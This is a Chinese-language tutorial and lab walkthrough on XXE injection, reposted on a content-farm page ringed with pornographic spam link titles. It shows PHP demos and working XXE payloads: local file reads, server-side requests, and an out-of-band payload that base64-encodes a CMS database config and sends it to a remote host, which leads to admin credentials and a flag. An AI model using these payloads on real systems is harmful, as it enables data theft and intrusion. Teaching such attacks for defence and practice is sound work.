日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 综合教程 >内容正文

综合教程

XXE漏洞——介绍及利用

發布時間:2024/9/5 综合教程 32 生活家
生活随笔 收集整理的這篇文章主要介紹了 XXE漏洞——介绍及利用 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

什么是xxe

XML外部實體注入,簡稱XXE漏洞。XML文檔結構包括XML聲明,DTD文檔類型定義,文檔元素。

XML示例

    <?xml version="1.0"?>XML聲明
    <!DOCTYPE note [
    <!ELEMENT note(to,from,heading,body)>
    <!ELEMENT to(#PCDATA)>
    <!ELEMENT from(#PCDATA)>            文檔定義類型(DTD)
    <!ELEMENT heading(#PCDATA)>
    <!ELEMENT body(#PCDATA)>
    ]>
    <note>
    <to>tove</to>
    <from>jani</from>
    <heading>reminder</heading>
    <body>don't forget me this weekend</body>            文檔元素
    </note>

DTD的內、外部聲明

內部聲明格式

<!DOCTYPE 根元素 [次一級元素聲明]

外部引用格式

<!DOCTYPE 根元素 SYSTEM "url路徑"

PHP示范利用DTD的外部使用操控XML

php代碼
<?php
	$test = '<!DOCTYPE xxx1 [<!ENTITY xxx2 SYSTEM "file:///c:/phpstudy_pro/123.txt">]><xxx3>&xxx2;</xxx3>';  //后面的標簽名,&實體聲明一定得有
	$obj = simplexml_load_string($test, 'simpleXMLElement', LIBXML_NOENT);
	print_r($obj);
?>
結果:

外部DTD支持的協議

簡單漏洞利用!

可以讓目標服務通過特定協議去訪問相關資源,從而實現SSRF(服務器請求偽造)
攻擊。我們還可以進行內網服務探測、端口探測等利用
利用http請求baidu
<?php
	$test = '<!DOCTYPE xxx1 [<!ENTITY xxx2 SYSTEM "https://baidu.com">]><xxx3>&xxx2;</xxx3>';
	$obj = simplexml_load_string($test, 'simpleXMLElement', LIBXML_NOENT);
	print_r($obj);
?>
結果

雖然頁面是很多Wraning警告,但其實我們已經得到了baidu的源碼數據

盲注漏洞利用!

XXE中也存在盲注,不會給你顯示東西。
思路

利用其他東西證明其存在

延時

寫文件

搭建一個服務器里邊有個php(test_blind.php)文件,訪問后搭建的服務器目錄生成一個文件

//test_blind.php  文件
<?php
file_put_contents("Yes.txt", $_GET["id"],FILE_APPEND);
?>

將結果外帶出來

DNS注入

反彈注入

SSRF和XXE最大的功能是能發起請求,這給了我們很大的空間發揮

復現環境

目標

閃靈建站cms

分析

目標是老版本閃靈源碼。然后我找不到這個版本了。

數據庫配置目錄文件

conn/conn.php

含有 simplexml_load_string 函數的漏洞目錄文件

weixin/index.php

思路

訪問含有漏洞的文件,發現其接受POST傳參作為XML執行。但同時必須傳入一個參數(signature)讓它不為空

圖片1

圖片2

解讀php://input
接收所有POST的數據

實踐

首先試探性的隨便傳一些數據。

發現爆出了絕對路徑。這時候我們可以構造XML

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=C:/phpStudy/scms/conn/conn.php">
<!ENTITY % remote SYSTEM "http://59.63.200.79:8017/1.xml">
%remote;
%send;
]>

% file 定義一個參數實體,SYSTEM表示外部引用。其中%remote是引用外部xml,那是靶場提供的xml,內容如下。

<!ENTITY % all
"<!ENTITY % send SYSTEM 'http://59.63.200.79:8017/2.php?id=%file;'>"
>
%all;

發現繼續報錯,但是這并沒關系。我們已經得到了想要的東西。再看靶場提供的3.txt文件,里邊記錄了我們獲得的信息

解密后得到數據庫連接密碼,但是

則是內網ip,接下來我們找找網站數據庫登錄后臺。這里是adminer.php

成功進入后臺,查表得管理員密碼

md5解密后記得flag

總結

以上是生活随笔為你收集整理的XXE漏洞——介绍及利用的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 久久久久久久黄色 | 国产视频福利在线观看 | 一区二区日韩视频 | 温柔女教师在线观看 | 日产亚洲一区二区三区 | 杨幂一区二区国产精品 | 色人阁五月天 | 动漫美女被吸乳奶动漫视频 | 蘑菇视频黄色 | 亚洲色偷偷色噜噜狠狠99网 | 999视频在线观看 | 国产精品三区在线观看 | 久久国产在线观看 | 亚洲天堂一区二区在线观看 | 国产黄频在线观看 | 久久久91精品 | 日日夜夜撸撸 | 成人影视在线看 | 日本丰满少妇 | 亚洲区欧美区 | 欧美一区二区在线观看 | 正在播放超嫩在线播放 | 折磨小男生性器羞耻的故事 | 最新的av网站 | 成人免费观看在线视频 | 中文字幕一区二区人妻痴汉电车 | 国产在线一级 | 爱情岛论坛亚洲品质自拍 | 国产aⅴ激情无码久久久无码 | 日日操日日爽 | 黄色免费网站视频 | 欧美国产在线观看 | 无码 制服 丝袜 国产 另类 | 天天cao在线 | 成人污在线观看 | 亚洲国产综合av | 精品无码三级在线观看视频 | 免费无码毛片一区二三区 | 国产欧美高清 | 亚洲日本色 | 亚洲情热| 国产成人毛毛毛片 | 亚洲高清无码久久久 | 国产主播在线一区 | 久久五十路 | 免费中文av | 超91在线 | 亚洲永久| 中文字幕码精品视频网站 | 老司机精品视频在线播放 | av男人的天堂在线观看 | 超碰网站在线 | 99九九久久| 热久久最新网址 | 免费视频精品 | 啪啪网视频 | 99视频久| 欧美午夜精品久久久久免费视 | 女生喷液视频 | 中文字幕在线观看视频一区二区 | 中文字幕一区二区三区手机版 | 欧美a级成人淫片免费看 | 好吊色青青草 | 91日本视频 | 暖暖视频日本 | 天天爽天天操 | 精品无码av在线 | 成人精品国产免费网站 | 欧美乱大交xxxxx | 国产一级影院 | 国产精品久久久久久吹潮 | av天堂一区 | 亚洲片国产一区一级在线观看 | 少妇高潮灌满白浆毛片免费看 | 国产麻豆乱码精品一区二区三区 | 日韩毛片高清在线播放 | 国产a网 | xx久久| 国产高清区 | 亚洲精品高清视频在线观看 | www.五月.com| 久久www视频| www.久久久久久久 | 国产成人自拍视频在线观看 | 天天爽夜夜爽夜夜爽精品 | 色婷婷国产精品 | 啦啦啦免费高清视频在线观看 | 成人午夜又粗又硬又大 | 成人在线免费小视频 | 一级黄色大片在线观看 | 青青青视频在线播放 | 精彩毛片 | 一级特黄毛片 | 欧美日韩精品 | 国产又粗又猛又爽又黄的 | 亚洲色图偷拍视频 | 天天艹夜夜艹 | 高清一区二区视频 | 夜夜嗨老熟女av一区二区三区 |